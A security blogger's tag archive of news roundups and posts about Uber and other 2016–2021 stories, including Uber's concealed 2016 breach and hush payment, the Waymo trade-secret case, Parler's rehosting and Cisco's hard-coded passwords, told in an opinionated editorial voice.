Tag Archives: Uber

Security News for the Week Ending January 22, 2021

Parler Finds A New Home With Russian Hosting Provider in Belize

“Hello world, is this thing on? With that message Parler’s website is back online. Well at least a one page website is back online. The site is being hosted by Russian-owned DDoS-Guard, a company that apparently also hosts ISIS web sites. Whether the folks who invaded the Capitol earlier this month are going to be willing to post their content on a Russian hosted server is not clear. It is unlikely that their hosting provider would respond to a US subpoena, but whether they would steal the posts for their own purpose is a different question. Credit: Cybernews

Capitol Terrorist Who (Allegedly) Planned to Sell Pelosi’s Laptop to Russian Intelligence Arrested

The amazing amount of video footage from the storming of the Capitol is really making the cops’ lives a lot easier. Riley June Williams, 22, from Pennsylvania, was outed by her former boyfriend. She videoed herself committing the felony and then shared that video. She has now been arrested. She has not been charged with espionage, yet. After the events of January 6th, she changed her phone number, deleted her social media accounts and fled. Her public defender wants her released but the feds say that she is a flight risk. Given she disappeared even before she was charged, that doesn’t seem unreasonable. Credit: WaPo

Parler Data Is Available for Download

If you want to be an amateur detective and you have 70 terabytes or so of free disk space on your computer, you too, can download the data that was scraped from the site during its last few hours of its existence. It is chunked down to 4GB chunks and more of it is being uploaded in real time. This will be examined and reexamined for a long time. Details can be found here.

Malware Bytes Joins Club of Those Hacked by SolarWinds Hacking Team

Malware Bytes joins the long and getting longer list of those folks sucked in by the Solar Winds attackers. In their case, they did not use Solar Winds but were compromised by other techniques used by the Solar Winds attackers. They said the damage was minor and limited to some of their emails. Credit: Cyber News

Trump Pardons Google Engineer Who Stole Self Driving Car Trade Secrets and Took Them to Uber

Anthony Levandowski, the Google Engineer who went to work for Uber’s self driving car division, was pardoned by Trump after being sentenced to 18 months for his theft. I am not sure if the pardon relieves him of the obligation to pay Google the $179 million fine, but it probably does. He took 141,000 files with him and likely advanced Uber’s progress by years. Google settled it’s lawsuit against Waymo in 2018 and paid a multi-hundred-million dollar fine. Curiously, Google is an investor in Uber, so they probably don’t want to hurt them too much. Credit: Cyber News

Breaches Down; Record Count Up

According to Risk Based Security, the NUMBER of breaches reported fell 48% in 2020 compared to 2019, but the number of records exposed was UP by 141% to an amazing 37 BILLION records. We don’t believe that the number of breaches was actually down; likely it is just that a lot of breaches are not being reported. Part of it may be that with other important events like the election and Covid, the media is not covering breaches. In addition, we are seeing some really large breaches. Hacking group Shiny Hunters disclosed 129 million hacked records in just five weeks. Credit: Tech Republic

Security News for the Week Ending August 21, 2020

August 13th, a Day That Will Live in Confusion

August 13th is the day that Part B of Section 889 of the 2019 National Defense Authorization Act went into effect. It bans the use of equipment and services tied to certain Chinese companies that have been deemed security threats by the United States. Companies that have this equipment won’t be able to sell to the federal government without a waiver. Contractors have 24 hours to report if they discover, after August 13th, that they are breaking the law. But contractors are allowed to self certify. While the ban went into effect on August 13th, the GSA training session for contractors has been delayed until mid-September – because they weren’t ready to coherently explain the rules. Ellen Lord, chief of the Pentagon’s acquisition branch asks contractors to take notes on how this is screwing up their business so that, maybe, they can get Congress to change the law. By the way, this is not a contract flow down clause, so primes are responsible for what their subs do, I guess. Sorry contractors. Credit: Federal Computer Weekly

Senators Say WikiLeaks Likely Knew He Was Helping Russia

The US Senate Select Committee on Intelligence says, in a report, that Vladimir Putin personally ordered the hacking of the DNC and WikiLeaks likely knew that it was helping Russia. The Senate report says WikiLeaks received internal DNC memos FROM Russian hackers. Senators wrote that Trump’s campaign staff sought advance notice of WikiLeaks releases. Paul Manafort is named as the person who was the link between the campaign and Russia. It seems odd that this Republican controlled committee would release this report days before the Republican National Convention’s nomination of Trump for President. Credit: The Register

Hide Your Breach – Go to Jail

The Feds have charged Uber’s Chief Security Officer with hiding information about the breaches they had in 2014 and 2016 and about payments they made to the hackers to keep the breach quiet. He is being charged with obstruction of justice and misprision of a felony (i.e. hiding it). He faces up to 8 years in prison if convicted. Credit: DoJ

Ever Wonder What Happens to All That Location Data that Apps Collect?

Well, the answer to that is, it depends. This week we found out one thing that happens to that data. The U.S. Secret Service buys it and uses it instead of having to get a warrant to get that same information from the phone company. Nothing illegal about it. Obviously, the Secret Service is not using it to market any products. Curiously, the company that they bought it from does not advertise that they sell your data to the police. In fact, their agreement, similar to the agreement that Stingray’s provider makes the police sign, says that they are forbidden from mentioning it in legal proceedings at all. When this has been an issue with Stingray’s the police have dropped charges rather than break the agreement. Credit: Hackread

Securus Sued For Recording Attorney-Client Jail Calls and Providing to Police

Securus provides pay phone services in prisons at what most people say are exorbitant prices. Sometimes they charge 100 times the going price outside. According to theory (and law), Securus is not supposed to listen to or record phone calls between inmates and their lawyers. The only reason they were caught was that a detective was listening to recordings provided to him by Securus and recognized the attorney’s voice. He then reported Securus to the Attorney General. The attorney who was illegally recorded is now suing Securus. The interesting thing is that Securus just settled a similar case in another state. You would think they would learn. Credit: The Register

Security News for the Week Ending September 28, 2018

Cisco Will Eliminate Hard Coded Passwords One Per Month

It seems like every patch cycle, Cisco admits to another app that has an undocumented hard coded password.  I have lost track of how many of them they have removed so far, but the number is scary large.

What is more scary is that I bet Cisco is far from unique – they are just being more honest about it.  Are all the other hardware vendors pure as the driven snow.  NOT LIKELY!

In this case, very embarrassingly, the hard coded password was in Cisco’s video surveillance manager.  In other words, the bad guys could secretly watch the watchers.

Cisco CLAIMS this was because they forgot to disable this hard coded ID (maybe used for testing) before the production code was released.

Recently Cisco has removed hard coded credentials from their Linux based OS, IOS XE, from their Digital Network Architecture server and from the Cisco Provisioning Server.  That is just recently.

This bug rated a 9.8 out of 10 on the severity Richter scale (CVSS V3).   Source: ZDNet.

Gig Workers Targeted by Malicious Attackers

This one is classically simple.

Gig workers, who have no IT department, are responding to gig requests on sites like Fiverr and Freelancer.

Unfortunately, those requests have documents associated with them that are infected.  When the gig worker opens the file to understand if he or she wants to bid on the gig, his or her computer is infected.  MAYBE the gig worker’s anti virus software will catch it, but if they are crafted just slightly differently for each attack, the AV software will be blind to it.

Freaking genius.  As long as it doesn’t happen to you.  Source: ZDNet.

Your Tax Dollars At Work

Like many public sector (not all!) networks, the security of the Pennsylvania Democratic Caucus was, apparently, not so great.  Equally unsurprisingly, their computers became infected with ransomware.

So they had two choices.  Pay the bad guys $30,000.

OR

Pay Microsoft $703,000 plus.

Of course, since this isn’t coming out of their pockets, they opted for the gold plated, diamond encrusted deal from Microsoft.

Surely, some local outfit would have rebuilt their servers for less than three quarters of a million dollars.

According to Homeland Security, over 4,000 ransomware attacks happen every day.  I have NO way to validate that claim, but I am sure the number is big.  Source : The Trib.

Uber Agrees to Pay $148 Million for Breach – Instead of $2 Billion under CCPA

Uber agreed to pay $148 million to settle claims that it covered up a breach in 2016 by PAYING OFF the hackers to keep quiet and supposedly delete the data.

Lets compare that to what they might have paid under CCPA, the new California law.

57 million records – say 5% in California = 2,850, 000 records.

Private right of action up to $750 per user without showing damage.  Let’s reduce that to $500 x 2.85 million = $1.425 billion.

AG right to sue for malicious non-compliance.  $7,500 (treble damages since the cover up was willful) x 2.85 million = $21.375 billion.

WORST CASE = A little over $22 BILLION.

BEST CASE (Maybe) = 10% of that, maybe $2 billion.

They got off light.

By the way, THIS is why companies are scared of the new law.

Source: Mitch

Newest iPhone, Newest iOS – Hacked in a Week

We tend to think of iPhones as secure.  Secure is a relative term and relatively, the iPhone is secure.

iOs 12 was released on September 17th, along with the new iPhones, the XS and the XS Max.

Today is the 28th and news articles abound that the  pair (new phone plus new software) has been hacked.

To be fair, Pangu team, the ground that announced the hack, said that they had hacked the beta back in June.

So, as long as you don’t think secure means secure, the iPhone is secure.

Less insecure might be a better term.  Source: Redmondpie .

Uber Naughty Tricks Hide Evidence of Theft

First a disclaimer:  I am not a lawyer and don’t pretend to be one on the Internet – at least most of the time.

The Uber Waymo trade secret theft trial is being delayed once again.

Why?  Because the Department of Justice showed the Judge a 37 page letter from the lawyer of a former Uber employee that Uber had not shared with Waymo.  The judge now wants the former employee to appear in court.

The judge is “unhappy” with Uber because he asked them to produce all relevant documents months ago and this document was not among those produced.  The judge said that he can’t trust anything that they say because they have been proven wrong so many times before.  That is probably not the best way to get on the good side of the judge.

The ex-employee was fired from his job at Uber in April but still works for them as a consultant.  They paid him $2+ million plus another million at the end of his consulting contract plus $1 million plus in Uber stock.

The ex-employee said that Uber has a unit within the company called marketplace analytics who’s job is to obtain competitive intel, “acquire” trade secrets and gathering code base.  Your basic dirty tricks organization who’s job it is to break the law and steal confidential information from competitors.

OK, maybe I am being a bit harsh on them, but the methods and techniques really determine whether they broke any laws or not and that is still to be seen.

The ex-employee said that the employees of this group were trained in impeding, obstructing or influencing any lawsuit against Uber.  This includes working very hard to make sure that there was no paper trail of what they were doing.

The employees used self destructing messaging services like Wikr, computers that could not be traced back to Uber and separate servers from the rest of the company.  They even made up reasons – apparently not legally valid ones – for attorney-client privilege.  They also engaged 10 outside security firms.

Waymo is suing Uber for almost $2 billion for theft of trade secrets.

Uber of course, said this is all made up.

There is one thing that is crystal clear as I play a lawyer on the Internet (no this is not legal advice).  *IF* and that is a big if, Uber hid information that they should have disclosed to the other side, that qualifies as a big no-no and could cause Uber all kinds of problems all the way up to the judge providing a verdict in Waymo’s favor.  That level of pain is VERY unusual, but the judge could fine the company, hold them in contempt or even instruct the jury to interpret certain facts in a way that is very unfavorable to Uber because of this.

Right now, he has delayed the trial while Waymo’s attorneys review the letter and decide what to do.

As far as how this affects you and me – if you believe that you MAY be sued, you have  “a duty to preserve” evidence that may be relevant to the future case.  Not preserving the evidence could cause you to lose the case.

OK, that seems pretty straight forward.

Well, maybe.  What if your employees, on their own, decided to use Telegraph or Wickr; decided to use other non-company systems to process or store data – all of which could be part of your duty to preserve.  And what if they did this without telling senior management about this.

The company could be in a world of hurt legally.

What this means is that you as an employer need to understand what tools your employees maybe using, even unofficially or unsanctioned and work with your corporate attorneys to figure out if that is a problem.

For certain industries, you have a duty to preserve even if there is no lawsuit anticipated, so for those companies, without regard to any potential lawsuit, using these tools can get them in trouble.

Something else for you to deal with.  Sorry.

Information for this post came from Reuters.

Uber Paid Hacker $100k Hush Money; Didn’t Disclose Breach

This may turn out to be a lesson in Internet law for everyone.

In October 2016, hackers breached Uber’s systems and made off with personal information for 57 million customers.  They also made off with other information for 7 million Uber drivers and 600,000 drivers license numbers.

Uber says that no socials or credit cards or trip information was taken.

At the time, Uber was fighting with U.S. regulators regarding privacy violations.  Someone inside the organization decided that, given what was going on, maybe burying this breach might be a better idea than fessing up.

So Uber paid the hackers $100,000 to “delete” the data.  I am sure that they did that because they are people of honor.  Then they buried the incident.

Fast forward a year and Uber has a new CEO after a whole bunch of bad press.  The CEO hires an outside law firm to help clean up the old west and what do they discover but an old breach, a $100,000 ransom and an oopsie, we forgot to report this.

Paying the ransom is probably not illegal.

Not telling shareholders that they were breached, well that is less clear.  I guess they could say that a breach of 57 million customers is not material.  Unless, that is, word about it gets out and they get sued – which is exactly what is happening now.

Not telling regulators about that – pretty clear that is illegal.

And, given that Uber operates in most states in the U.S. and there are different privacy laws in each of the states, they likely broke the law in a whole bunch of states.

IF, and this is not clear, there was information on residents of foreign countries, they likely broke foreign laws as well.

Here is the lesson in Internet law.

Since the breach was disclosed, the New York AG has said he is investigating and a lawsuit has been filed seeking class action status.

Uber’s co-founder learned of the breach in November 2016, right after Uber had settled a privacy lawsuit with the New York AG and was negotiating with the FTC over the handling of consumer data.  Apparently he decided not to tell the AG or the FTC.

The hack was pretty simple.  The hackers found a private Github repository that apparently was not adequately (or at all) protected and found Amazon web services credentials in that repository.  They logged on to Amazon, found the data and attempted to extort Uber.

Uber does not have a reputation as a model citizen; in fact they have been involved in at least five criminal probes over bribes, illegal software, questionable pricing schemes and other issues.  This fits right in there.

Uber has brought in some high priced talent to help sort out the mess and rehabilitate their image.  Former GC of the NSA (not sure they sould be a role model for Uber), for example.  Based on some questionable NSA activities in the past, he may fit right into Uber’s culture.

What we don’t know at this point is what the various state regulators are going to do about this.  I assume that regulators COULD revoke Uber’s license to operate in their state, but I doubt that will happen.

Could the various states file criminal and/or civil charges – that I suspect is much more likely, especially since they knowingly covered up the breach?

I am sure that it will be at least a few months before we have any idea on the scope of the fallout.  Given Uber’s past and very rocky relationship with regulators, those same regulators may decide that it is payback time.

Information for this post came from Bloomberg.

Uber Spies on Customers, Including Celebs

One thing about data rich environments – you have to trust that the data keepers do what they say they are going to do.

As we all know, Uber collects a lot of data – even data that they don’t know what they will use it for – but surely they will need it in the future – for something.

Uber has said that it can’t access ride information for users, but a former Uber security expert says that is not the case.  He says that Uber employees stalked ex boyfriends and girlfriends and celebrities.

Spangenberg, who is now suing Uber for age discrimination, says that employees can track politicians, Ex’es, celebrities and personal acquaintances of Uber employees.

A couple of years ago, the concept of “God View” became public – a feature in the Uber software that allowed employees to bypass privacy and security controls.

According to Spangenberg, even driver’s socials are at risk.

The only data, he says, that is not at risk, is credit card information.  That is not because they protect it but rather because they use a third party (Braintree) to process credit card transactions.

Spangenberg objected, he says, to reckless and illegal practices and Uber fired him.

Another ex Uber employee, Michael Sierchio, a former senior security engineer, said that when he was at Uber, you could stalk an ex or look up anyone’s ride with the flimsiest of excuses.  There was no approval required.  He said that Uber was interested in growth at all costs and was told that they were not a security company.

Uber said that it fired fewer than 10 employees who abused the feature.  Of course, if you don’t look, you won’t find any problems, so that number is meaningless.  They claim to have hundreds of security and privacy experts working around the clock.

According to security experts, Uber’s policy is based on the honor system, which employees can abuse at any time.

While Uber has instituted some controls, Spangenberg says that if you know what you are doing you can get around them forever.

Personally, taxis work pretty well for me most of the time.  If you do use Uber, you should probably kill the app or reboot your phone after you get out of the car.

Information for this post came from Fox News.